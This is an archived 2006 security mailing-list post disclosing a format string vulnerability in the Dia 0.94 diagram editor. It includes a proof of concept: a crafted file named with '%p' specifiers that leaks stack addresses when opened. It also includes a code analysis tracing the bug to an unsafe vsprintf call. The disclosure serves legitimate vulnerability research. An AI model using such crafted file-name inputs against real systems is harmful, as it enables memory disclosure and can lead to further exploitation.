|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
DIA file name handling format string
king_purba
yahoo.co.uk
Date: Fri May 05 2006 - 23:51:14 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Author : KaDaL-X
http://kandangjamur.net
Software tested
Dia v 0.94 on fedora Core 4
Dia v 0.94 on Mandriva
http://www.gnome.org/projects/dia
PoC :
------
[ph03n1xkaiten ~]$ touch %p%p%p%p.bmp
Now, open %p%p%p%p.bmp using dia then error something like this will happen
Failed to load:
Couldn't recognize the image file format for file
'0xbfec1a480xc0cf670x89608b00x9f247e.bmp'
Code analisys:
--------------
in plug-ins/pixbuf/pixbuf.c line 152
else if (error) /* otherwise a pixbuf misbehaviour */
{
message_warning ("Failed to load:\n%s", error->message);
g_error_free (error);
}
then in lib/message.c line 220
message_warning(const char *format, ...)
{
va_list args, args2;
va_start (args, format);
va_start (args2, format);
message_internal(_("Warning"), format, &args, &args2);
va_end (args);
va_end (args2);
}
On lib/message.c line 187 message_internal has been defined as
static MessageInternal message_internal = gtk_message_internal;
Now, analizyng gtk_message_internal() function on lib/message.c on line
157
vsprintf() function was used incorrectly
vsprintf (buf, fmt, *args2);
The second argument of vsprintf must be a constant string, based on
/usr/include/stdio.h
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]